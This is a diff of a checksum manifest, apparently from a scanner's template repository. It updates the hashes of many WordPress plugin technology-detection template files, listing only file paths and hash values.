-http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:6b829502bedd78aae545f30777fe1f110f16a7ad
-http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087
-http/technologies/wordpress/plugins/google-listings-and-ads.yaml:4ea09b17d82c48189149274385a07113cf6c77f6
-http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b
-http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b
-http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b
-http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0
-http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630
-http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:2c6eb5a2958fa71c5f9b9f3c9cc3f923957ae653
-http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7
-http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90
-http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078
-http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb
-http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994
-http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c
-http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47
-http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43
-http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5
-http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf
-http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b
-http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952
-http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e
-http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c
-http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9
-http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9
-http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9
-http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787
-http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764
-http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93
-http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b
-http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc
-http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d
-http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea
-http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d
-http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd
-http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f
-http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919
-http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251
-http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e
-http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6
-http/technologies/wordpress/plugins/ml-slider.yaml:02dff647f100193d671151fb1e67b2f5ddcc8a53
-http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9
-http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c
-http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f
-http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6
-http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11
-http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0
-http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8
-http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70
-http/technologies/wordpress/plugins/otter-blocks.yaml:323522fa2b0c8af98838b2347a51f91ceefc2067
-http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1
-http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12
-http/technologies/wordpress/plugins/photo-gallery.yaml:382590e69485fae675191962251cb3c5bd385aba
+http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724
+http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c
+http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba
+http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27
+http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96
+http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e
+http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4
+http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f
+http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07
+http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1
+http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c
+http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff
+http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a
+http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e
+http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309
+http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c
+http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d
+http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a
+http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae
+http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299
+http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7
+http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9
+http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369
+http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844
+http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c
+http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636
+http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e
+http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d
+http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a
+http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef
+http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f
+http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7
+http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057
+http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3
+http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459
+http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad
+http/technologies/wordpress/plugins/custom-fonts.yaml:45b1c43ca8b833a6d10518e214d69e9c87e3282c
+http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f
+http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7
+http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0
+http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af
+http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a
+http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677
+http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121
+http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984
+http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45
+http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201
+http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab
+http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8
+http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77
+http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e
+http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca
+http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa
+http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444
+http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016
+http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1
+http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba
+http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d
+http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823
+http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0
+http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24
+http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca
+http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336
+http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a
+http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3
+http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:8f722e7fd4d82c5a072583269575be55ab6d3124
+http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae
+http/technologies/wordpress/plugins/google-listings-and-ads.yaml:d43e8f2af19c16d5e9d768be20676774bb14653f
+http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0
+http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214
+http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc
+http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb
+http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9
+http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913
+http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372
+http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765
+http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2
+http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23
+http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7
+http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317
+http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461
+http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4
+http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30
+http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e
+http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b
+http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f
+http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde
+http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a
+http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac
+http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc
+http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3
+http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046
+http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8
+http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b
+http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0
+http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c
+http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3
+http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519
+http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4
+http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb
+http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4
+http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623
+http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd
+http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb
+http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510
+http/technologies/wordpress/plugins/ml-slider.yaml:3a91387c9a73aa27dcfe61ae0f6c73803d90410a
+http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9
+http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29
+http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf
+http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8
+http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5
+http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4
+http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159
+http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af
+http/technologies/wordpress/plugins/otter-blocks.yaml:dd77f96680874688c4f833694d8282493a4b3ba8
+http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68
+http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18
+http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd
http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553
-http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f
-http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83
-http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a
-http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa
-http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da
-http/technologies/wordpress/plugins/post-types-order.yaml:f79cb83aa5e58f0845684ed7d79839a99080bcea
-http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4
-http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39
-http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4
-http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad
-http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175
-http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5
-http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864
-http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845
-http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490
-http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf
-http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291
-http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:db7d02819167f56a4ad9747b0f63648c9c1c787c
-http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d
-http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59
+http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c
+http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d
+http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988
+http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e
+http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2
+http/technologies/wordpress/plugins/post-types-order.yaml:ac4e48bb51998b2fb77e25135e3a34ccd1ff5bb3
+http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4
+http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156
+http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4
+http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147
+http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19
+http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b
+http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8
+http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55
+http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd
+http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08
+http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f
+http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:0869b92e5fc5980a1d9af28e866cba52048985d7
+http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6
+http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a
http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751
-http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492
-http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81
-http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350
-http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da
+http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2
+http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd
+http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730
+http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c
http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8
-http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f
-http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6
-http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1
-http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa
-http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08
-http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2
-http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338
-http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357
-http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903
-http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237
-http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4
-http/technologies/wordpress/plugins/under-construction-page.yaml:cab0384d64d3d0621ab71655e8ad6c30b862de74
+http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1
+http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69
+http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60
+http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc
+http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284
+http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b
+http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928
+http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4
+http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a
+http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390
+http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a
+http/technologies/wordpress/plugins/under-construction-page.yaml:262bf6f78177ba5b569e23f498beeef8f35cc453
http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea
-http/technologies/wordpress/plugins/updraftplus.yaml:60fe37dcc4096c4f3780d83c361552fec4a0bccb
-http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd
-http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8
-http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233
-http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c
-http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521
-http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a
-http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472
-http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634
-http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839
-http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265
-http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67
-http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82
-http/technologies/wordpress/plugins/woocommerce-payments.yaml:d4e216da24359b39cc1229c175f3645fb166139e
-http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b
-http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee
-http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba
-http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40
+http/technologies/wordpress/plugins/updraftplus.yaml:581d99c9e67beb70a5e5c360d55e56a4f0e55619
+http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487
+http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb
